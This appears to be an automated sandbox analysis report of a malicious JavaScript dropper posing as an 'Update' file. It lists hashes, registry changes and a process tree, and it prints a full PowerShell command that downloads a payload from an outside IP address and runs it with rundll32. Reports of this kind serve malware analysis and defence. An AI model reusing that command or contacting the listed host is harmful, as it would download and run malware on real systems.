Resubmissions
15-08-2024 20:42
240815-zhg3jaxglr 1014-06-2024 12:05
240614-n89dxszekb 1028-05-2024 22:27
240528-2dhvdagb62 10Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
28-05-2024 22:27
Static task
static1
Behavioral task
behavioral1
Sample
Update_25_04_2024_3146918.js
Resource
win7-20240419-en
General
-
Target
Update_25_04_2024_3146918.js
-
Size
135KB
-
MD5
bf7f711e823916e5f56ff4d2286ee866
-
SHA1
d9c9d093ce5f1cbc78280ab0232b5d6ef8c25729
-
SHA256
0c9697506df18baac4b4215e78a43926ea4bb94ea3607c851a1c2fe3b5b31f17
-
SHA512
842616018719df7c6ee7cac5996ea1399a2a459353ee96de2bf9fda122aac861baa0a5c848dad1d4aa756fab897d1e7a978eac359458d52801020685db67d941
-
SSDEEP
1536:XDOApMn1gDmN2yBCn/yA3seAeLCMamLcInL1VXJ3Duvnr:6A+n1gDmNnw/yA3slMamLcInL7tDuvr
Malware Config
Extracted
http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89
Signatures
-
Blocklisted process makes network request 20 IoCs
flow pid Process 6 2756 rundll32.exe 7 2756 rundll32.exe 8 2756 rundll32.exe 9 2756 rundll32.exe 10 2756 rundll32.exe 11 2756 rundll32.exe 12 2756 rundll32.exe 13 2756 rundll32.exe 14 2756 rundll32.exe 15 2756 rundll32.exe 16 2756 rundll32.exe 17 2756 rundll32.exe 18 2756 rundll32.exe 19 2756 rundll32.exe 20 2756 rundll32.exe 21 2756 rundll32.exe 22 2756 rundll32.exe 23 2756 rundll32.exe 24 2756 rundll32.exe 25 2756 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 4 IoCs
pid Process 2756 rundll32.exe 2756 rundll32.exe 2756 rundll32.exe 2756 rundll32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F619XONJ.htm rundll32.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\RtlUpd.job rundll32.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
pid Process 2632 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe -
Modifies data under HKEY_USERS 21 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\82-28-e3-aa-b2-56 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\82-28-e3-aa-b2-56\WpadDecision = "0" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9EB4FAD6-89F5-40FF-B803-F070AB8F50B4}\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9EB4FAD6-89F5-40FF-B803-F070AB8F50B4}\82-28-e3-aa-b2-56 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9EB4FAD6-89F5-40FF-B803-F070AB8F50B4}\WpadDecisionTime = 6013f3714eb1da01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00d5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9EB4FAD6-89F5-40FF-B803-F070AB8F50B4}\WpadDecisionReason = "1" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9EB4FAD6-89F5-40FF-B803-F070AB8F50B4}\WpadNetworkName = "Network 3" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\82-28-e3-aa-b2-56\WpadDecisionReason = "1" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\82-28-e3-aa-b2-56\WpadDecisionTime = 6013f3714eb1da01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9EB4FAD6-89F5-40FF-B803-F070AB8F50B4} rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2080 powershell.exe 2632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2080 powershell.exe Token: SeDebugPrivilege 2632 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2248 wrote to memory of 2080 2248 wscript.exe 28 PID 2248 wrote to memory of 2080 2248 wscript.exe 28 PID 2248 wrote to memory of 2080 2248 wscript.exe 28 PID 2080 wrote to memory of 2632 2080 powershell.exe 30 PID 2080 wrote to memory of 2632 2080 powershell.exe 30 PID 2080 wrote to memory of 2632 2080 powershell.exe 30 PID 2632 wrote to memory of 2168 2632 powershell.exe 32 PID 2632 wrote to memory of 2168 2632 powershell.exe 32 PID 2632 wrote to memory of 2168 2632 powershell.exe 32 PID 620 wrote to memory of 2756 620 taskeng.exe 34 PID 620 wrote to memory of 2756 620 taskeng.exe 34 PID 620 wrote to memory of 2756 620 taskeng.exe 34
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Update_25_04_2024_3146918.js1⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89' -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\olhqjgdh.q1a,Start4⤵
- Drops file in Windows directory
PID:2168
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D1130CCC-10D6-44A5-92FB-0376B90242D1} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\ProgramData\RtlUpd\RtlUpd.dll",Start /p2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:2756
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c9c483bcd5d3d73bd705d56469a8546d
SHA16a7d5eb09c12bf91e29e0cd133bc710f8a63b996
SHA25654744466e8c259dee3830aef6995c36df8cefbe1afced15014a3a48f916f1c59
SHA5127ae451d271aa2e74c8d04e08d06c1ffab8e27920d56a1295938fe5bf6d110dd0d93146a3cc83029d86fb73220cb32834fb5227520c8c27be027876f2cf09d653
-
Filesize
141KB
MD5039ff182524d1f3c109869d5bee699a1
SHA19da43496bcb967ce77f18ed8a3ee19d53661e242
SHA256a5f16fa960fe0461e2009bd748bc9057ef5cd31f05f48b12cfd7790fa741a24e
SHA5123654009a9785e45488bb14cecea88a7a232976f003a32a9d5856572e491c580046629a3f0b2c130a1022a196677b1695643f7e2a457203233ba08fb13639317e